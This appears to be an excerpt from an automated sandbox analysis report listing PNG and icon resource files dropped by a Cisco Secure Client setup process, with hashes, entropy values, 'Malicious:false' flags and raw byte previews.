                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-EGJ19.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                      MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                      SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                      SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                      SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-EGLKD.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                      MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                      SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                      SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                      SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-EOIS7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-EPJHD.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-F3EJH.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                      MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                      SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                      SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                      SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-FFDDS.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                      MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                      SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                      SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                      SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-FGF10.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-GP2E9.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                      MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                      SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                      SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                      SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-GQNPV.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-HKSJU.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-HLFIT.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                      MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                      SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                      SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                      SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-HLOEC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\is-ILK0N.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
